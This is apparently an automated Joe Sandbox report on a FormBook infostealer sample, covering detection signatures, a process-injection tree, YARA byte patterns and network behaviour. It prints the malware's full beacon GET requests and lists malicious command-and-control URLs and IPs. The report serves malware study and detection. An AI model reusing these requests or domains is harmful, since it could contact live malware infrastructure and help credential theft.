Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
opp46lGmxd.exe

Overview

General Information

Sample name:opp46lGmxd.exe
renamed because original name is a hash value
Original sample name:0f399d1b3a7c6dd28867095c2bdb2098.exe
Analysis ID:1454256
MD5:0f399d1b3a7c6dd28867095c2bdb2098
SHA1:ad22ee54a3f642a81ff9f48fbaba9af1f39c79b8
SHA256:a49d396f7f272b32af4ef12abb52d5bc92ff2c97ca09b1d79436e13f1b9bf192
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Switches to a custom stack to bypass stack traces
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • opp46lGmxd.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\opp46lGmxd.exe" MD5: 0F399D1B3A7C6DD28867095C2BDB2098)
    • svchost.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\opp46lGmxd.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hKABgfptdlPzDLVJYF.exe (PID: 924 cmdline: "C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7692 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • hKABgfptdlPzDLVJYF.exe (PID: 6576 cmdline: "C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ParentImage: C:\Users\user\Desktop\opp46lGmxd.exe, ParentProcessId: 7528, ParentProcessName: opp46lGmxd.exe, ProcessCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ProcessId: 7584, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ParentImage: C:\Users\user\Desktop\opp46lGmxd.exe, ParentProcessId: 7528, ParentProcessName: opp46lGmxd.exe, ProcessCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ProcessId: 7584, ProcessName: svchost.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: opp46lGmxd.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.660danm.top/fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85Avira URL Cloud: Label: malware
            Source: http://www.empowermedeco.com/fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85Avira URL Cloud: Label: malware
            Source: http://www.empowermedeco.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.660danm.top/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.magmadokum.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.kasegitai.tokyo/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.kasegitai.tokyo/fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85Avira URL Cloud: Label: malware
            Source: http://www.magmadokum.com/fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85Avira URL Cloud: Label: malware
            Source: http://www.shenzhoucui.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.shenzhoucui.com/fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85Avira URL Cloud: Label: malware
            Source: https://www.empowermedeco.com/fo8o/?Zl4h1=mxnRAvira URL Cloud: Label: malware
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for submitted file
            Source: opp46lGmxd.exeReversingLabs: Detection: 57%
            Source: opp46lGmxd.exeVirustotal: Detection: 67%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: opp46lGmxd.exeJoe Sandbox ML: detected
            Source: opp46lGmxd.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3851208680.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613457617.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AC4696
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00ACC9C7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACC93C FindFirstFileW,FindClose,0_2_00ACC93C
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ACF200
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ACF35D
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ACF65E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AC3A2B
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AC3D4E
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00ACBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ACBF27
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032ABAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_032ABAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_03299480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_0329DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_0388053E

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: unknownNetwork traffic detected: IP country count 11
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 116.50.37.244 116.50.37.244
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00AD25E2
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
